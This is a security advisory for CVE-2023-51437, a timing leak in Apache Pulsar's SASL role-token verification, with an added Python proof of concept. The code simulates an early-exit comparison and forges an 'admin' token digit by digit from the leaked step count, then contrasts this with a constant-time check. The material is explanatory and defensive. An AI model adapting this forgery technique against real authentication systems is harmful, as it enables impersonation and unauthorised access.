Observable Discrepancy
CVE-2023-51437
Summary
Observable timing discrepancy vulnerability in the Apache Pulsar SASL Authentication Provider can allow an attacker to forge a SASL Role Token that will pass signature verification. In practice this means the signature check takes a measurably different amount of time depending on how much of the supplied signature matches the expected value, so an attacker who can time many verification requests can recover a valid signature for a role of their choosing without ever learning the signing secret.

This issue affects org.apache.pulsar:pulsar-broker-auth-sasl versions prior to 2.11.3, 3.0.x prior to 3.0.2, and 3.1.0. Users are recommended to upgrade to a fixed version. Users should also consider updating the configured secret in the file referenced by "saslJaasServerRoleTokenSignerSecretPath": upgrading closes the timing leak, but a token forged while the old secret was in use keeps passing verification until that secret is rotated.

Any component matching the above versions and running the SASL Authentication Provider is affected. That includes the Pulsar Broker, Proxy, WebSocket Proxy, and Function Worker.
CVSS v3 metrics
- HIGH
- NETWORK
- HIGH
- UNCHANGED
- NONE
- NONE
- HIGH
- NONE
CWE-203 - Observable Discrepancy
The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor, which exposes security-relevant information about the state of the product, such as whether a particular operation was successful or not.
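What the timing discrepancy buys an attacker, as an added example that is not part of this advisory or of Pulsar's source: the Python below models a role-token signer with the vulnerable early-exit comparison beside the constant-time one, and recovers a valid token for the "admin" role using nothing but the leak. The token layout u=<role>&s=<signature>, the HMAC-SHA256 signature, the secret value and the step-counting oracle are all constructed assumptions for the example; a real attacker measures network round-trip time over many samples instead of reading a step counter, which is why such attacks take effort but not the secret. hmac.compare_digest plays the role that java.security.MessageDigest.isEqual plays in Java code.

```python
from __future__ import annotations

import hashlib
import hmac

# Constructed stand-in for the secret read from saslJaasServerRoleTokenSignerSecretPath.
SECRET = b"constructed-example-secret"
HEX = "0123456789abcdef"
SIG_LEN = 64  # hex digits in an HMAC-SHA256 signature


def compute_signature(role: str) -> str:
    """Signature over the role name; HMAC-SHA256 is an assumed choice for this example."""
    return hmac.new(SECRET, role.encode(), hashlib.sha256).hexdigest()


def sign(role: str) -> str:
    """Issue a role token. The u=<role>&s=<signature> layout is assumed for the example."""
    return f"u={role}&s={compute_signature(role)}"


def split_token(token: str) -> tuple[str, str]:
    body, sep, sig = token.rpartition("&s=")
    if not sep or not body.startswith("u="):
        raise ValueError("malformed token")
    return body[2:], sig


def leaky_equal(a: str, b: str) -> tuple[bool, int]:
    """Early-exit comparison: the vulnerable pattern.

    Returns (equal, characters examined). The count stands in for elapsed time:
    the loop stops at the first mismatch, so its duration grows with the length
    of the matching prefix. That is the observable discrepancy of CWE-203.
    """
    if len(a) != len(b):
        return False, 0
    steps = 0
    for x, y in zip(a, b):
        steps += 1
        if x != y:
            return False, steps
    return True, steps


def verify_leaky(token: str) -> tuple[str | None, int]:
    """Vulnerable verifier: accepted role (or None) plus the leaked step count."""
    role, sig = split_token(token)
    ok, steps = leaky_equal(sig, compute_signature(role))
    return (role if ok else None), steps


def verify_constant_time(token: str) -> str | None:
    """Fixed verifier: hmac.compare_digest runs in time independent of where the
    inputs differ, so the attacker learns only accept/reject."""
    role, sig = split_token(token)
    ok = hmac.compare_digest(sig.encode(), compute_signature(role).encode())
    return role if ok else None


def forge(role: str, oracle) -> str:
    """Recover a valid token for `role` one hex digit at a time, using only the
    timing proxy the leaky verifier exposes. SECRET is never touched here."""
    recovered = ""
    for pos in range(SIG_LEN):
        best_digit, best_steps = "", -1
        for digit in HEX:
            guess = recovered + digit + "0" * (SIG_LEN - pos - 1)
            token = f"u={role}&s={guess}"
            accepted, steps = oracle(token)
            if accepted is not None:
                return token  # whole signature recovered (distinguishes the last digit)
            # A wrong digit stops the comparison after pos+1 steps; the right one runs past it.
            if steps > best_steps:
                best_digit, best_steps = digit, steps
        recovered += best_digit
    raise RuntimeError("oracle never accepted a token; is it really leaking?")


if __name__ == "__main__":
    forged = forge("admin", verify_leaky)
    print("forged token:", forged)
    print("accepted by the fixed verifier as:", verify_constant_time(forged))
```

The forgery needs at most 64 x 16 oracle queries, and the recovered token is a genuine signature under the secret, which is why the advisory recommends rotating the secret and not only upgrading: the fixed verifier still accepts it. Against verify_constant_time the attacker receives no step count, so the same search has nothing to rank candidates by.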